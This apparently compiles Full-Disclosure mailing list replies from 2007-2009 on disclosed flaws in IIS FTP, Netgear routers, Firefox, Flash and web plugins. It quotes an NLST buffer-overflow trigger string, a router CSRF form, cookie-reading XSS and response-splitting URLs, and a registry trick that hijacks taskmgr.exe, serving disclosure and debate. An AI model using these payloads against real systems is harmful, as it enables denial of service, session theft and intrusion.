Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

[Vladimir '3APA3A' Dubrovin]

Dear Guido Landi,

For  DoS  - yes, you can use existing file, but it's (almost) impossible
to  create  reliable  code  excution  exploit  since you can not (fully)
control  return address, like required in JMP ESP technique used in this
exploit.

--Wednesday, September 2, 2009, 12:33:47 PM, you wrote to 
3ap...@security.nnov.ru:

GL> no, MKDIR is *not* required, also write access is *not* required.

GL> Assuming a directory with a name that starts with "A" exists and that is
GL> at least 14 chars long, this pattern will trigger the overflow:


GL> NLST [Ax206]*/../A*/../A*/../A*/../A*/../A*/../A*/../A*/\r\n


GL> At least on win2k3. Therefore, the workarounds for kb975191 on
GL> microsoft.com are wrong.



GL> Guido Landi

GL> Vladimir '3APA3A' Dubrovin wrote:
>> Dear Thierry Zoller,
>> 
>> I   think   yes,   MKDIR   is   required.  It  should  be  variation  of
>> S99-003/MS02-018.  fuzzer  should  be very smart to create directory and
>> user  both  oversized buffer and ../ in NLST - it makes path longer than
>> MAX_PATH with existing directory.
>> 
>> --Monday, August 31, 2009, 8:21:12 PM, you wrote to
>> full-disclosure@lists.grok.org.uk:
>> 
>> 
>> TZ> Confirmed.
>> 
>> TZ> Ask  yourselves why your fuzzers haven't found that one - Combination of
>> TZ> MKDIR are required before reaching vuln code ?
>> 
>> 
>> 
>> 
>> 

GL> ___
GL> Full-Disclosure - We believe in it.
GL> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
GL> Hosted and sponsored by Secunia - http://secunia.com/


-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
Есть там версии Отелло, где Дездемона душит Мавра. (Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Internet Information Server ftpd zeroday

[Vladimir '3APA3A' Dubrovin]

Dear Thierry Zoller,

I   think   yes,   MKDIR   is   required.  It  should  be  variation  of
S99-003/MS02-018.  fuzzer  should  be very smart to create directory and
user  both  oversized buffer and ../ in NLST - it makes path longer than
MAX_PATH with existing directory.

--Monday, August 31, 2009, 8:21:12 PM, you wrote to 
full-disclosure@lists.grok.org.uk:


TZ> Confirmed.

TZ> Ask  yourselves why your fuzzers haven't found that one - Combination of
TZ> MKDIR are required before reaching vuln code ?





-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
Жало мне не понадобится (С. Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Update: [TZO-06-2009] IBM Proventia - Generic bypass (Limited disclosure - see details)

[Vladimir '3APA3A' Dubrovin]

Thierry,

 I think inability of antivirus / intrusion detection to catch something
 that is not malware/intrusion or malware in the form unused in-the-wild
 is   not  vulnerability.  Antivirus  (generally)  gives  no  preventive
 protection.  They  can add signatures for your PoCs to their database -
 and that's how it works.

--Thursday, July 16, 2009, 12:02:35 AM, you wrote to bugt...@securityfocus.com:



TZ> As I received a lot of feedback on this bug, I thought I'd update you. 
After not replying
TZ> to my notifications and subsequent forced partial disclosure, IBM stated
TZ> officially on their website that they where not affected and to my surprise
TZ> IBM got in contact immediately after disclosure to "coordinate"

TZ> If your read the Timeline till the end, the story has a nice swing.., 
Drama, insults,
TZ> everything. You could make a soap opera out of it. And you don't even have 
all the mails.

TZ> What happened during this "coordination" even surprised myself. I am used 
to discussions,
TZ> I am used to stupid answers. However what happened here bears no 
description.


TZ> Short Guerilla Version of the Timeline  (complete timeline below):
TZ> ---
TZ> - Hey Thierry sorry, we did not get your report, we'll keep you updated!
TZ> We have IBM written on the proventia boxes but don't send reports to IBM!!

TZ> - Post official statement to IBM website that IBM is NOT affected and
TZ> forgetting to inform Thierry

TZ> - Thierry, You cannot evade proventia, because we use special propretary
TZ> ingredients!

>> What are these ingredients?

TZ> - We won't tell !! and by the way you suck! your test methods suck! You 
aren't even
TZ> EAL2 ! A test team costs too much to tests your POCs! Your mails suck! 
Learn from
TZ> the big mighty IBM. 

>> Sorry, the same poc evaded proventia last year! So you mus miss something!!

TZ> - Thierry, stop sending us POC files, YOU CANNOT EVADE PROVENTIA, IT is
TZ> IMPOSSIBLE, IRREVQUABLE, PERIOD 

>>Silence

TZ> - Thierry here is our report, you DID evade all our proventia products, we 
will
TZ> credit you.



TZ> In the timeline below you find my summary
TZ> -
TZ> 02.04.2009 - Forced partial disclose
TZ> 02.04.2009 - An known contact at IBM asks for the POC
TZ> 02.04.2009 - POC is resend
TZ> 02.04.2009 - An third person is added to the coordination "list"
TZ> 04.04.2009 - Sending another POC file (RAR)
TZ> 06.04.2009 - POC is acknowledged and promise is made to get back
TZ>  once the material has been analysed.
TZ> 10.04.2009 - Sending another POC file (ZIP)
TZ> 10.04.2009 - The third person ergo the "Cyber
TZ> Incident & Vulnerability Handling PM" is taking over coorindation

TZ> 14.04.2009 - A comment was made to my blog that indicated IBM did
TZ> answer the Bugtraq posting and negate my findings, having 
TZ> received no response from them personaly I ask
TZ> "Dear Peter, I was refered to this url in a comment posted to my blog:
TZ> http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=5417
TZ> can you confirm this ?"

TZ> 15.04.2009 -  IBM responds:
TZ> "[..] we
TZ> apologize that the path of communicating the disclosure was somewhat
TZ> confusing.  [..]  The IBM contact address in the
TZ> OSVDB is typically used for software products that are in another division
TZ> of IBM, and thus, your report was not routed to us in a timely manner.  In
TZ> the future, we'd prefer that you contact myself directly"

TZ> "We have now investigated the TZO-04-2009-IBM incident you reported and have
TZ> found that we are not susceptible to this evasion."
TZ> "[..]in  this  case,  there  are  other  components in our Proventia
TZ> products that prevent this evasion from occurring"
TZ> "Testing our production products, rather than testing this one
TZ> piece of our technology, then you would have been able to see the same
TZ> results"

TZ> 16.04.2009 - As my tests indicate otherwise I ask "Could you please
TZ> specify which >components< would prevent the evasion, as it is
TZ> hard  to see how to prevent it when the unarchiver code cannot extract
TZ> the code itself" and
TZ> "I  would  be  glad  to do so [Red:test production products] : 
TZ> Please send the respective appliances to "


TZ> 16.04.2009 - IBM answers
TZ> [..] "We are not an open source company, so the internal workings of
TZ> our proprietary software is not something we publicly disclose.  
TZ> We do not provide our products for free to all of the independent 
TZ> testers that might be interested in our product lines--the number 
TZ> of requests simply would not be scalable or manageable if
TZ> we did"

TZ> 17.04.2009 - As I have no way to reproduce and IBM gives no details
TZ> about their OH-SO Secret propretary software I state that 
TZ> "I  cannot  verify  nor  reproduce your statements as such I will leave
TZ> this CVE entry as disputed." "Please provide tangible proof that 
TZ> you de

Re: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface

[Vladimir '3APA3A' Dubrovin]

Dear Shaked  Vax,

 Are  you  sure  Radware  Team have analysed reflected attack via user's
 browser  (AppWall  administrator visits malcrafted page, page redirects
 his request to AppWall) before excluding remote vector?

--Thursday, July 2, 2009, 3:23:16 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

SV> Radware team has completed analysis of the reported issue, concluding
SV> that no AppWall customer using the product  according to Radware
SV> deployment recommendations would be exposed to vulnerability as a result
SV> of this issue. This is due to the facts that this issue exists only on
SV> the management interface that is recommended to be connection to
SV> internal LAN only, and that it does not allow performing any actions
SV> that would influence machine functionality.
SV>  Nevertheless, in order to enforce our commitment to deliver top
SV> security solution to our customers, Radware will supply a fix for this
SV> issue within its upcoming AppWall release.

SV> Shaked Vax
SV> AppWall Product Manager 
SV> shak...@radware.com 
 

SV> ___
SV> Full-Disclosure - We believe in it.
SV> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
SV> Hosted and sponsored by Secunia - http://secunia.com/


-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
Но Гарри... я безусловно отдаю предпочтение ему, за
высокую питательность и какое-то особенно нежное мясо. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

[Vladimir '3APA3A' Dubrovin]

Adrian,

  If  you  can execute javascript - what is a reason to wait for user to
  click  the  link? The message I reply stated there is no need to force
  user  to  visit  Web  page  and clicking the obfuscated link _sent_ to
  admin is enougth. I replied in this case only GET request is possible.
  Read the thread carefully before making conclusions.
  
  
--Wednesday, June 17, 2009, 2:58:15 AM, you wrote to 
jeremi.gos...@motricity.com:

AP> you would be surprised how many people out there (mistakenly) still
AP> think that only GET requests are CSRFable!

AP> 2009/6/16 Jeremi Gosney :
>> Vladimir: "Where there is an open mind, there will always be a frontier." - 
>> Charles Kettering
>>
>> > action='http://192.168.1.1/cgi-bin/firmwarecfg' name='DoS'>
>>   
>> 
>> > onclick='document.DoS.submit();'>Google
>>
>>
>>
>> -Original Message-
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>> Vladimir Dubrovin
>> Sent: Tuesday, June 16, 2009 9:43 AM
>> To: sr.
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
>>
>> Dear sr.,
>>
>>  clicking  on  the  link can not produce POST request, only GET, unless
>>  there   are   some   special   conditions,   like  crossite  scripting
>>  vulnerability in the router.
>>
>> --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632
>> Router Remote DoS Vulnerability to full-disclosure@lists.grok.org.uk;
>>
>> s> it could still be carried out remotely by obfuscating a link sent to the
>> s> "admin" of the device. this would obviously rely on the admin clicking on
>> s> the link, and is more of a phishing / social engineering style attack. 
>> this
>> s> would also rely on the router being setup with all of the default internal
>> s> LAN ip's.
>>
>> s> sr.
>>
>>
>> s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>
>>
>>>> Dear Tom Neaves,
>>>>
>>>>  It  still can be exploited from Internet even if "remote management" is
>>>> only  accessible  from local network. If you can trick user to visit Web
>>>> page,  you  can  place  a  form on this page which targets to router and
>>>> request to router is issued from victim's browser.
>>>>
>>>>
>>>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:
>>>>
>>>> TN> Hi.
>>>>
>>>> TN> I see where you're going but I think you're missing the point a little.
>>>>  By
>>>> TN> *default* the web interface is enabled on the LAN and accessible by
>>>> anyone
>>>> TN> on that LAN and the "remote management" interface (for the Internet) is
>>>> TN> turned off.  If the "remote management" interface was enabled, stopping
>>>> ICMP
>>>> TN> echo responses would not resolve this issue at all, turning the
>>>> interface
>>>> TN> off would do though (or restricting by IP, ...ack).  The "remote
>>>> management"
>>>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no
>>>> amount of
>>>> TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to
>>>> discuss
>>>> TN> this off list with you if its still not clear to save spamming
>>>> everyone's
>>>> TN> inboxes. :o)
>>>>
>>>> TN> Tom
>>>>
>>>> TN> - Original Message -
>>>> TN> From: Alaa El yazghi
>>>> TN> To: Tom Neaves
>>>> TN> Cc: bugt...@securityfocus.com ;
>>>> full-disclosure@lists.grok.org.uk
>>>> TN> Sent: Monday, June 15, 2009 11:03 PM
>>>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>>>>
>>>>
>>>> TN> I know and I understand. What I wanted to mean is that we can not
>>>> eventually
>>>> TN> acces to the web interface of a netgear router remotely if we cannot
>>>> localy.
>>>> TN> As for the DoS, it is simple to solve  such attack from outside. We
>>>> just
>>>> TN> disable receiving pings (There is actually an option in even the lowest
>>>> TN> series) and thus, we would be able to have

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

[Vladimir '3APA3A' Dubrovin]

Dear Tom Neaves,

 It  still can be exploited from Internet even if "remote management" is
only  accessible  from local network. If you can trick user to visit Web
page,  you  can  place  a  form on this page which targets to router and
request to router is issued from victim's browser.


--Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:

TN> Hi.

TN> I see where you're going but I think you're missing the point a little.  By
TN> *default* the web interface is enabled on the LAN and accessible by anyone
TN> on that LAN and the "remote management" interface (for the Internet) is
TN> turned off.  If the "remote management" interface was enabled, stopping ICMP
TN> echo responses would not resolve this issue at all, turning the interface
TN> off would do though (or restricting by IP, ...ack).  The "remote management"
TN> (love those quotes...) interface speaks over HTTP hence TCP so no amount of
TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to discuss
TN> this off list with you if its still not clear to save spamming everyone's
TN> inboxes. :o)

TN> Tom

TN> - Original Message - 
TN> From: Alaa El yazghi
TN> To: Tom Neaves
TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
TN> Sent: Monday, June 15, 2009 11:03 PM
TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


TN> I know and I understand. What I wanted to mean is that we can not eventually
TN> acces to the web interface of a netgear router remotely if we cannot localy.
TN> As for the DoS, it is simple to solve  such attack from outside. We just
TN> disable receiving pings (There is actually an option in even the lowest
TN> series) and thus, we would be able to have a remote management without ICMP
TN> requests.



TN> 2009/6/15 Tom Neaves 

TN> Hi.

TN> I'm not quite sure of your question...

TN> The DoS can be carried out remotely, however one mitigating factor (which
TN> makes it a low risk as opposed to sirens and alarms...) is that its turned
TN> off by default - you have to explicitly enable it under "Remote Management"
TN> on the device if you want to access it/carry out the DoS over the Internet.
TN> However, it is worth noting that anyone on your LAN can *remotely* carry out
TN> this attack regardless of this management feature being on/off.

TN> I hope this clarifies it for you.

TN> Tom
TN> - Original Message - 
TN> From: Alaa El yazghi
TN> To: Tom Neaves
TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
TN> Sent: Monday, June 15, 2009 10:45 PM
TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


TN> How can it be carried out remotely if it bugs localy?


TN> 2009/6/15 Tom Neaves 

TN> Product Name: Netgear DG632 Router
TN> Vendor: http://www.netgear.com
TN> Date: 15 June, 2009
TN> Author: t...@tomneaves.co.uk 
TN> Original URL:
TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
TN> Discovered: 18 November, 2006
TN> Disclosed: 15 June, 2009

TN> I. DESCRIPTION

TN> The Netgear DG632 router has a web interface which runs on port 80.  This
TN> allows an admin to login and administer the device's settings.  However,
TN> a Denial of Service (DoS) vulnerability exists that causes the web interface
TN> to crash and stop responding to further requests.

TN> II. DETAILS

TN> Within the "/cgi-bin/" directory of the administrative web interface exists
TN> a
TN> file called "firmwarecfg".  This file is used for firmware upgrades.  A HTTP
TN> POST
TN> request for this file causes the web server to hang.  The web server will
TN> stop
TN> responding to requests and the administrative interface will become 
TN> inaccessible
TN> until the router is physically restarted.

TN> While the router will still continue to function at the network level, i.e.
TN> it will
TN> still respond to ICMP echo requests and issue leases via DHCP, an 
TN> administrator will
TN> no longer be able to interact with the administrative web interface.

TN> This attack can be carried out internally within the network, or over the
TN> Internet
TN> if the administrator has enabled the "Remote Management" feature on the
TN> router.

TN> Affected Versions: Firmware V3.4.0_ap (others unknown)

TN> III. VENDOR RESPONSE

TN> 12 June, 2009 - Contacted vendor.
TN> 15 June, 2009 - Vendor responded.  Stated the DG632 is an end of life
TN> product and is no
TN> longer supported in a production and development sense, as such, there will
TN> be no further
TN> firmware releases to resolve this issue.

TN> IV. CREDIT

TN> Discovered by Tom Neaves 

TN> ___
TN> Full-Disclosure - We believe in it.
TN> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
TN> Hosted and sponsored by Secunia - http://secunia.com/


-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них 
поверили. (Твен)

___
Full-Di

Re: [Full-disclosure] Addendum : [TZO-26-2009] Firefox (all?) Denial of Service through unclamped loop (SVG)

[Vladimir '3APA3A' Dubrovin]

Dear Jim Parkhurst,

It  may  depend  on  video  card  and  video  drivers  and/or  amount of
memory/video  memory.  9  years  ago there was vulnerability in Internet
explorer  with  displaying scaled image:
http://securityvulns.com/advisories/ie5freeze.asp   results   were  also
different  on  different  hardware.  In some cases even mouse cursor was
frozen and reboot was only option.


--Wednesday, May 27, 2009, 7:56:56 PM, you wrote to c...@cert.org:

JP> If I understand the process, saving the text at [IV. Proof of
JP> concept] (following the "~~~..." to an .XHTML file, and launch the
JP> file using Firefox, I should lose functionality ("Browser doesn't
JP> respond any longer to any user input, all tabs are no longer
JP> accessible, your work if any  (hail to the web 2.0) might be lost.")

JP> Using FF2.0.0.20 and the file does not result in loss of use.
JP> All tabs are functional. All JAVA links continue function.  Same
JP> result for naming the POC file to .HTML, .HTM.

 Thierry Zoller  05/26/2009 13:13 >>>


JP> For  those that failed to reproduce, try naming the POC file with an XHTML
JP> extension.



-- 
Skype: Vladimir.Dubrovin
~/ZARAZA http://securityvulns.com/
Машина оказалась способной к единственному действию,
а именно умножению 2x2, да и то при этом ошибаясь. (Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Update (re-)installs outdated Flash ActiveX on Windows XP

[Vladimir '3APA3A' Dubrovin]

Dear Stefan Kanthak,

As far as I can see, Internet Explorer actually uses flash10b.ocx.
Adobe
Flash Player 10.0 r22

--Monday, April 20, 2009, 8:17:24 PM, you wrote to bugt...@securityfocus.com:

SK> Windows Update (as well as Microsoft Update and the Automatic Update)
SK> installs an outdated (and from its manufacturer unsupported) Flash
SK> Player ActiveX control on Windows XP.


SK> Although this fact is nothing really new it but shows the lack of taking
SK> care for security problems and in general the chuzpe of many software
SK> "producers" to ship their "products" with outdated and often vulnerable
SK> components.


SK> The ouverture:

SK> * Windows XP RTM (i.e. the original release version without any service
SK>   packs) installs a Flash Player ActiveX control SWFLASH.OCX v5.0r42

SK> * Windows XP Service Pack 1 updates the SWFLASH.OCX to v5.0r44

SK> * Windows XP Service Pack 2 (released in August 2004) replaces the
SK>   SWFLASH.OCX with FLASH.OCX v6.0r79

SK> * security update KB913433 (see
SK> 
SK>   and
SK> )
SK>   updates FLASH.OCX to 6.0r84

SK> * security update KB923789 (see
SK> 
SK>   and
SK> )
SK>   updates FLASH.OCX to 6.0r88

SK> * Windows XP Service Pack 3 (released in April 2008) contains the same
SK>   FLASH.OCX v6.0r79 as Service Pack 2, i.e. none of the security updates
SK>   published after Service Pack 2 were incorporated!
SK>   The MSKB article KB948460 but STILL states wrong that KB913433 (sic!)
SK>   is included in Service Pack 3

SK> To my knowledge Adobe stopped direct support for Flash Player 6 in late
SK> 2005, the newest version of Flash Player ActiveX 6.0 available on their
SK> web site  is 6.0r79 from 2005-11-11.
SK> Later versions of Flash Player ActiveX 6.0 were available from Microsoft
SK> only:
SK> 
SK> and 

SK> I doubt that these outdated Flash Player ActiveX controls are safe and
SK> not vulnerable to current exploits, so Microsoft puts it's customers
SK> clearly at risk.


SK> The unhappy end:

SK> * Start with a fully patched Windows XP with Service Pack 3 AND the
SK>   current Adobe Flash Player ActiveX v10.0r22.87 installed.

SK>   Since recent Flash Player installers remove any older versions of the
SK>   ActiveX control this means that neither FLASH.OCX nor SWFLASH.OCX are
SK>   present in %SystemRoot%\System32\Macromed\ or
SK>   %SystemRoot%\System32\Macromed\Flash\

SK> * Install an arbitrary software product that installs a Flash Player
SK>   ActiveX prior to 6.0r88 (there are MANY software products that do so).

SK>   For example, get the current MSN CD-ROM "MSN 9.6-PROD", part no.
SK>   X14-85160-02 DE from Microsoft; this CD-ROM contains the product
SK>   "Digital Image Standard Edition 2006" v11.1 from 2007-01-29, which
SK>   installs an outdated and VULNERABLE FLASH.OCX v6.0r29 to
SK>   %SystemRoot%\System32\Macromed\!

SK>   Note that the installer was created AFTER KB923789, which but was not
SK>   incorporated. Does Microsoft really care about security?

SK>   If you dont want to order the MSN CD-ROM a trial version of "Digital
SK>   Image Starter Edition 2006" is available from
SK>  
SK> 


SK>   If you dont want to install such a big product either, get the
SK>   Windows Update KB913433 from
SK>  
SK> 

SK>   extract the Flash Player ActiveX installer INSTALL_FP6_WU.EXE from
SK>   the package and run the installer.

SK>   The attempt to install a Flash Player ActiveX prior to 6.0r88 over a
SK>   later version does not YET any harm, since starting with 6.0r88 Adobe
SK>   sets deny ACLs on the
SK> %SystemRoot%\System32\Macromed\Flash\FLASH*.OCX
SK>   as well as all the registry entries which prevent earlier Flash Player
SK>   ActiveX installers to overwrite them, so any Flash Player ActiveX
SK>   6.0r88 and later is preserved.

SK>   Any of the above mentioned products but installs the previously not
SK>   existent file %SystemRoot%\System32\Macromed\Flash\FLASH*.OCX

SK> * Visit  (or wait till the daily
SK>   run of the Automatic Update) and install the Windows Update KB923789.

SK>   This but DOES harm: since the Flash Player ActiveX installer that has
SK>   been wrapped in KB923789 (re-)sets the ACLs it overwrites the registry
SK>   entries of the newer/recent Flash Player ActiveX. DAMAGE DONE!


SK> I informed Microsoft in the last two years several times about this
SK> problem and discussed it with various members of their Microsoft Security
SK> R

Re: [Full-disclosure] iDefense Security Advisory 10.30.08: Adobe PageMaker Key Strings Stack Buffer Overflow

[Vladimir '3APA3A' Dubrovin]

Dear iDefense Labs,



--Thursday, October 30, 2008, 11:24:35 PM, you wrote to [EMAIL PROTECTED]:


iL> VII. CVE INFORMATION

iL> The Common Vulnerabilities and Exposures (CVE) project has assigned the
iL> name CVE-2008-6432 to this issue. This is a candidate for inclusion in
iL> the CVE list (http://cve.mitre.org/), which standardizes names for
iL> security problems.

I bet it should be CVE-2007-6432

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Local persistent DoS in Windows XP SP2 Taskmanager

[3APA3A]

Dear SkyOut,

I see no security impact here.

RegOpenKeyEx(HKEY_LOCAL_MACHINE, 
"SOFTWARE\\Microsoft\\PCHealth\\ErrorReporting", 0, KEY_SET_VALUE, &hKey);

requires  administrative  privileges.  If user has ones, you can achieve
better results by deleting task manager of trojaning it.

You can also use

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image
File Execution Options\taskmgr.exe\Debug

key to launch notepad.exe instead of taskmgr.exe.

--Friday, March 14, 2008, 10:49:31 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

S> Dear list,

S> after weeks of total ignorance by Microsoft I decided to finally  
S> release all information
S> related to a bug, that has to do with the Windows XP SP2 Taskmanager.
S> Manipulating
S> a Registry key makes it possible to disable the Taskmgr. On the next
S> startup it will crash with
S> an error message. It is possible to backup the key and repair the  
S> Registry doing so, but
S> the attack scenario is clear: A virus uses this code, the user can't
S> open the Taskmgr anymore
S> and your process is somehow "hidden".

S> The full information about this bug, can be found here:
S> http://core-security.net/archive/2008/march/index.php#14032008

S> And the exploit is available here:
S> http://core-security.net/releases/exploits/taskmgr_dos.c.txt

S> Greets,
S> SkyOut

S> ---
S> core-security.net
S> ---


-- 
~/ZARAZA http://securityvulns.com/
ЭНИАКам - по морде!  (Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [FDSA] Multiple Vulnerabilities in Your Computer (all versions)

[3APA3A]

Well, I cant' say it's all fake... It's all junk.

FD> OpenSSL 0.9.7j
FD>   openssl-0.9.7j/fips-1.0/aes/fips_aesavs.c 973: User supplied data
FD> copied into fixed length buffer on the stack with no length
FD> verification.

Buffer  overflow in non-suid test application (not compiled by default).
Not security.

FD> SSH 3.2.9.1
FD>   ssh-3.2.9.1/lib/zlib/contrib/minizip/minizip.c 187: User supplied
FD> data copied into fixed length buffer on the stack with no length
FD> verification.

Identical to CVE-2007-1657 and is probably fixed in the same time. Local
overflow in non-suid application (minizip). Do not affect SSH. Only this
one can be considered as low risk vulnerability.

FD> Apache 1.3.37
FD>   src/regex/split.c 164: User supplied data copied into fixed length
FD> buffer on the stack with no length verification.

Local  buffer  overflow  in  non-suid  test  application,  which  is not
compiled by default. Not security.

FD> Samba 3.0.25b
FD>   samba-3.0.25b/source/popt/poptparse.c 27: Integer overflow in size_t
FD> which is later used in heap allocation. Buffer then copied into this
FD> memory resulting in heap overflow.

This one is fake.

size_t nb = (argc + 1) * sizeof(*argv);

...

nb += strlen(argv[i]) + 1;

...

dst = malloc(nb);

Mathematical  provement:

nb <= memory already allocated for argc and argv < size of address space
nb < size of address space
QED


-- 
~/ZARAZA http://securityvulns.com/
Всегда будем рады послушать ваше чириканье (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] what is this?

[3APA3A]

Dear Jose Nazario,


JN> te file you sent here contains a bunch of embeded nulls (every other
JN> character  is  00).  stripping  those  out reveals ...  jose

JN> nazario, ph.d.   http://monkey.org/~jose/

This  is  Little  Endian  UCS-2  Unicode, not a bunch of embedded nulls.
Never stop to educate yourself.

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] what is this?

[3APA3A]

Dear Nick FitzGerald,

--Monday, January 14, 2008, 2:52:23 PM, you wrote to 
full-disclosure@lists.grok.org.uk:


NF> U -- the only part of that likely to be relevant here is the last.

NF> These kinds of web page "compromises" are typically achieved through
NF> bad/ill-configured/non-updated   server-side  web  applications  (or
NF> their  underlying script engines) and are typically achieved without
NF> requiring  any more special or privileged access to the victim sites
NF> than  the  ability  to  run  a  clever  Google  search  or  your own
NF> brute-force spidering via a bot-net, etc.

During  last  few  months,  we  monitor  mass infection attempts through
stollen  FTP passwords.

Yes,  web  exploitation  scenario  is also possible. These are automated
exploitation requests received during a single day:

http://securityvulns.com/files/exprequests.txt

In  this  case  there  is  a  quick workaround (and also a good security
practice)  of  disabling  write access for web server account. Of cause,
investigation is required anyway.


-- 
~/ZARAZA http://securityvulns.com/
Всегда будем рады послушать ваше чириканье (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] what is this?

[3APA3A]

Dear crazy frog crazy frog,

  Clear  your  computer  from  trojan,  change FTP password for you site
  hosting  access,  because it's stolen, access your hosting account via
  FTP  and remove additional text (usually at the end of the file, after
  ) from all HTML/PHP pages.

--Sunday, January 13, 2008, 7:01:34 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

cfcf> Hi,

cfcf> Recently on opening one of my site,my antivirus pops up saying that it
cfcf> has found on malicious script.the url is random and i have managed to
cfcf> get tht script.it is using some flaw in apple quick time.
cfcf> u can get the zip file for java script here:
cfcf> http://secgeeks.com/what.zip
cfcf> password is 12345
cfcf> can somebody guide/help me what is this and how can i remove it?



-- 
~/ZARAZA http://securityvulns.com/
Стреляя во второй раз, он искалечил постороннего. Посторонним был я. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] securityvulns.com russian vulnerabilities digest

[3APA3A]

ds/2007/MoBiC/WP-ContactForm%20CSRF8.html
  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
  
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html

 Original article (in Russian):
  http://securityvulns.ru/Sdocument667.html
  http://securityvulns.ru/Sdocument546.html
 Additional details (in Ukrainian):
  http://websecurity.com.ua/1641/
  http://websecurity.com.ua/1600/

5. RotaBanner Local <= 3 crossite scripting

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Original article (in Russian): http://securityvulns.ru/Sdocument625.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1442/


6. ExpressionEngine <= 1.2.1 response splitting and crossite scripting

http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E

 Original article (in Russian): http://securityvulns.ru/Sdocument472.html
 Additional details (in Ukrainian): http://websecurity.com.ua/1454/
 
-=-=-=-

 There  are  also  few vulnerabilities published in English as a part of
 the Month of Bugs in CAPTCHA:
 
Cryptographp  <=  1.2  WordPress plugin multiple persistant crossite
scriptings

 Original article: http://websecurity.com.ua/1596/

XSS in Math Comment Spam Protection < 2.2

 Original article: http://websecurity.com.ua/1576/

XSS in Captcha! <= 2.5d

 Original article: http://websecurity.com.ua/1588/
 

 
-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] multiple CAPTCHA automation test bypass digest

[3APA3A]

ss CAPTCHA.

Vulnerability  is  reported  in  reCaptcha  plugin  for  Drupal, but
according to reCaptcha developers, vulnerability is in Drupal code.

Original article: http://websecurity.com.ua/1505/
Exploit: http://websecurity.com.ua/uploads/2007/MoBiC/reCaptcha.txt



   
-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
